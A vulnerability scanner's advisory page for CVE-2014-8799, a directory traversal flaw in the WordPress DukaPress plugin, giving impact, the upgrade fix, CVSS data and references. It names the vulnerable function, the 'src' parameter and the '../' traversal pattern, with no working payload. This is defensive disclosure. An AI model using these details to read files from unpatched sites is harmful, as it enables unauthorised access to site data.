Wordpress DukaPress 'src' Parameter Directory Traversal Vulnerability Network Vulnerability

Summary

This host is installed with Wordpress DukaPress and is prone to directory traversal vulnerability.

Impact

Successful exploitation will allow remote attackers to download arbitrary files. Impact Level: Application

Solution

Upgrade to version 2.5.4 or higher, For updates refer to https://wordpress.org/plugins/dukapress

Insight

Flaw is due to the dp_img_resize function in the php/dp-functions.php script not properly sanitizing user input, specifically path traversal style attacks (e.g. '../') via the 'src' parameter that contains '..' to lib/dp_image.php.

Affected

Wordpress DukaPress plugin before 2.5.4

Detection

Send a crafted data via HTTP GET request and check whether it is able to read arbitrary files or not.

References

http://www.exploit-db.com/exploits/35346
http://www.osvdb.org/115130
http://xforce.iss.net/xforce/xfdb/98943

Updated on 2015-03-25

Severity

Classification

CVE CVE-2014-8799
CVSS Base Score: 5.0
AV:N/AC:L/Au:N/C:P/I:N/A:N

Related Vulnerabilities

Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
Aardvark Topsites PHP 'index.php' Multiple Cross Site Scripting Vulnerabilities
Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities
Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability

Take action and discover your vulnerabilities